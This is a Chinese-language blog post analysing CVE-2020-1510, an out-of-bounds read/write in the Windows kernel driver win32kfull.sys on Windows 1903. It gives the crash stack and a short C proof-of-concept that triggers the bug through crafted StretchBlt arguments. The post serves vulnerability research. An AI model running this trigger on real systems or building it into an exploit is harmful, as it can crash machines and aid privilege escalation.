CVE-2020-1510漏洞分析

0x00漏洞信息

漏洞影响：本地提权

漏洞文件：win32kfull.sys

漏洞函数：pxrlStrRead01AND

漏洞原因：越界读写

分析系统：Windows 1903

【漏洞分析合集】

0x01漏洞分析

崩溃时的堆栈：

nt!KeBugCheckEx+0x107
nt!MiSystemFault+0x1d3171
nt!MmAccessFault+0x34f
nt!KiPageFault+0x360
win32kfull!pxrlStrRead01AND+0x5b
win32kfull!EngStretchBltNew+0xdc9
win32kfull!EngStretchBlt+0xd1
win32kfull!EngStretchBltROP+0x157
win32kfull!BLTRECORD::bStretch+0x37e
win32kfull!GreStretchBltInternal+0x721
win32kfull!NtGdiStretchBlt+0x68

和CVE-2020-1247漏洞原因一样只是触发位置不一样

0x02验证poc

#include <Windows.h>


int main()
{
    HDC r0 = CreateCompatibleDC(0x0);
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x3, 0x1);
    SelectObject(r0, r1);
    HDC  r2 = GetWindowDC(0x0);
    StretchBlt(r0, 0x0, 0x0, 0x800, 0x1, r2, 0x0, 0x7, 0xffffffffffeffff4, 0xfffffffffffffff8, 0xcc001c);

    return 0;
}

要开启特殊池稳定触发

方法看

CVE-2020-1247漏洞分析

posted @ 2023-02-27 16:07 紅人阅读(134) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

MSRC TOP100

悟已往之不谏，知来者之可追

CVE-2020-1510漏洞分析

0x00漏洞信息

【漏洞分析合集】

0x01漏洞分析

0x02验证poc

CVE-2020-1247漏洞分析

公告